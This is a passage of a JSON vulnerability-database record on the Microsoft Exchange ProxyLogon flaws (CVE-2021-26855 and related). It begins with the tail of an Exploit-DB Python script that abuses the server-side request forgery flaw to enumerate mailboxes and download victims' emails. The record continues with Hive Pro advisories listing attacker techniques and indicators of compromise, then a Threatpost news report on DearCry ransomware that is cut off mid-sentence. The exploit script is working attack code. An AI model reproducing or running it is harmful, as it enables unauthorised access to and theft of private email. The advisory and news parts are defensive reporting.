<BaseShape>AllProperties</BaseShape></m:ItemShape>\r\n <SortOrder/>\r\n <m:ParentFolderIds>\r\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </m:ParentFolderIds>\r\n <QueryString/>\r\n </m:FindItem>\r\n </soap:Body>\r\n</soap:Envelope>\r\n\"\"\"\r\n\r\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\r\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\r\n <ItemShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </ItemShape>\r\n <ItemIds>\r\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </ItemIds>\r\n </GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\"\"\"\r\n\r\n\r\ndef getFQDN(url):\r\n print(\"[*] Getting FQDN from headers\")\r\n rs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\")\r\n if \"X-FEServer\" in rs.headers:\r\n return rs.headers[\"X-FEServer\"]\r\n else:\r\n print(\"[-] Can't get FQDN \")\r\n exit(0)\r\n\r\n\r\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla pwner\"}\r\n from xml.etree import ElementTree as ET\r\n dom = ET.fromstring(content_folderid)\r\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\r\n id_folder = p[0].attrib.get(\"Id\")\r\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, dowloading email\")\r\n break\r\n print(\"[+]Getting mails...\")\r\n dom_messages = ET.fromstring(rs.text)\r\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\r\n for m in messages:\r\n id_message = m[0].attrib.get(\"Id\")\r\n change_key_message = m[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_mail.format(id_message, change_key_message)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, downloading email\")\r\n break\r\n\r\n try:\r\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\r\n f.write(rs.text)\r\n f.close()\r\n except Exception as e:\r\n print(\"[!] Can't write .xml file to path (email): \", e)\r\n\r\n\r\ndef checkURI(url, fqdn):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\r\n for uri in arr_uri:\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"),\r\n headers=headers)\r\n #print(rs.content)\r\n if rs.status_code == 200 and \"MessageText\" in rs.text:\r\n print(\"[+] Valid URI:\", uri)\r\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\r\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\r\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n else:\r\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n return uri, calculated_domain\r\n #time.sleep(1)\r\n print(\"[-] No valid URI found ;(\")\r\n exit(0)\r\n\r\n\r\ndef checkEmailBoxes(url, uri, user, fqdn, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\r\n headers=headers)\r\n #time.sleep(1)\r\n #print(rs.content)\r\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\r\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\r\n print(\"[+] Valid Email Found!: {}\".format(user))\r\n extractEmail(url, uri, user, fqdn, rs.text, path)\r\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\r\n print(\"[-] Not Valid Email: {}\".format(user))\r\n\r\n\r\ndef main():\r\n __URL__ = None\r\n __FQDN__ = None\r\n __mailbox_domain__ = None\r\n __path__ = None\r\n print(\"[***** OhhWAA *****]\")\r\n parser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\r\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\r\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\r\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\r\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\r\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\r\n args = parser.parse_args()\r\n __URL__ = args.url\r\n __FQDN__ = args.fqdn\r\n __mailbox_domain__ = args.domain\r\n __list_users__ = args.list\r\n __valid_users__ = []\r\n __path__ = args.path\r\n if not __FQDN__:\r\n __FQDN__ = getFQDN(__URL__)\r\n print(\"[+] Got FQDN:\", __FQDN__)\r\n\r\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\r\n\r\n if not __mailbox_domain__:\r\n __mailbox_domain__ = calculated_domain\r\n\r\n list_users = open(__list_users__, \"r\")\r\n for user in list_users:\r\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\r\n\r\n print(\"[!!!] FINISHED OhhWAA\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49879", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now. These vulnerabilities are actively exploited by multiple threat actors named DeadRinger. DeadRinger has been affecting the telecommunication industry all around the world. DeadRinger consists of three clusters. The first one includes threat group Softcell which has been active since 2012. The Naikon group, which has been active since 2020, is the second cluster. We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nAs a response, Hive Pro Threat Researchers advises that you address these vulnerabilities.\n\nThe Techniques used by the DeadRinger includes: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 47.56.86[.]44 \n45.76.213[.]2 \n45.123.118[.]232 \n101.132.251[.]212 \nSHA-1 Hash | 19e961e2642e87deb2db6ca8fc2342f4b688a45c \nba8f2843e2fb5274394b3c81abc3c2202d9ba592 \n243cd77cfa03f58f6e6568e011e1d6d85969a3a2 \nc549a16aaa9901c652b7bc576e980ec2a008a2e0 \nc2850993bffc8330cff3cb89e9c7652b8819f57f \n440e04d0cc5e842c94793baf31e0d188511f0ace \ne2340b27a4b759e0e2842bfe5aa48dda7450af4c \n15336340db8b73bf73a17c227eb0c59b5a4dece2 \n5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 \n0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 \n81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 \ne93ceb7938120a87c6c69434a6815f0da42ab7f2 \n207b7cf5db59d70d4789cb91194c732bcd1cfb4b \n71999e468252b7458e06f76b5c746a4f4b3aaa58 \n39c5c45dbec92fa99ad37c4bab09164325dbeea0 \nefc6c117ecc6253ed7400c53b2e148d5e4068636 \na3c5c0e93f6925846fab5f3c69094d8a465828e9 \na4232973418ee44713e59e0eae2381a42db5f54c \n5602bf8710b1521f6284685d835d5d1df0679b0f \ne3fcda85f5f42a2bffb65f3b8deeb523f8db2302 \n720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 \nb699861850e4e6fde73dfbdb761645e2270f9c9a \n6516d73f8d4dba83ca8c0330d3f180c0830af6a0 \n99f8263808c7e737667a73a606cbb8bf0d6f0980 \na5b193118960184fe3aa3b1ea7d8fd1c00423ed6 \n92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db \nd9e828fb891f033656a0797f5fc6d276fbc9748f \n87c3dc2ae65dcd818c12c1a4e4368f05719dc036 \nDomain | Cymkpuadkduz[.]xyz \nnw.eiyfmrn[.]com \njdk.gsvvfsso[.]com \nttareyice.jkub[.]com \nmy.eiyfmrn[.]com \nA.jrmfeeder[.]org \nafhkl.dseqoorg[.]com \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": "https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. Furthermore, threat actors can use the detected credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and then encrypts the victim's documents and files with the ".avos" extension. The actor then leaves a ransom letter in each directory named "GET YOUR FILES BACK.txt" with a link to an AvosLocker .onion payment site. The Organizations can mitigate the risk by following the recommendations: \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by Avoslocker are: TA0001: Initial AccessTA0002: ExecutionTA0007: DiscoveryTA0040: ImpactT1566: PhishingT1204: User ExecutionT1082: System Information DiscoveryT1490: Inhibit System RecoveryT1489: Service StopT1486: Data Encrypted for Impact Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continue to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.\n\nResearchers 